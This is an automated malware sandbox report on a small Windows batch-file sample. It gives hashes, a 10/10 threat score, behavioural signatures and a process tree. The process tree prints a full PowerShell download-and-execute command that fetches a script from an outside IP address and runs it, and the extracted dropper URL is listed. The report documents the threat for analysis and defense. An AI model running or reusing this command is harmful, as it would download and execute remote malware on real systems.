Analysis
-
max time kernel
21s -
max time network
50s -
platform
windows7_x64 -
resource
win7v200722 -
submitted
03-09-2020 19:10
Static task
static1
Behavioral task
behavioral1
Sample
01619b049472811b76565ddd589bc9eb.bat
Resource
win7v200722
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
01619b049472811b76565ddd589bc9eb.bat
Resource
win10v200722
windows10_x64
0 signatures
0 seconds
General
-
Target
01619b049472811b76565ddd589bc9eb.bat
-
Size
221B
-
MD5
3ab48b49f0f231c470e42900d1a7e59f
-
SHA1
a25a30cfa56bd61d0484e2a37fd86fb365edf99a
-
SHA256
d58ef2af3b2f9387c21e0e0b5b81594a995dc4a09e8befa0f0d95700bc9a342c
-
SHA512
f6a7e33125726389dd01e7cfcce2286050cc48d56b465c719f8d5bfe6facef0fbf83ad47111c52ecd3d67f090e394dfaa842013f71b9b7d81f2c0e8c4e9ab4e5
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/01619b049472811b76565ddd589bc9eb
Signatures
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 5 1388 powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1388 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1388 powershell.exe 1388 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1388 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
cmd.exedescription pid process target process PID 748 wrote to memory of 1388 748 cmd.exe powershell.exe PID 748 wrote to memory of 1388 748 cmd.exe powershell.exe PID 748 wrote to memory of 1388 748 cmd.exe powershell.exe PID 748 wrote to memory of 1388 748 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\01619b049472811b76565ddd589bc9eb.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:748 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/01619b049472811b76565ddd589bc9eb');Invoke-BSCFPHAYQBPUGG;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1388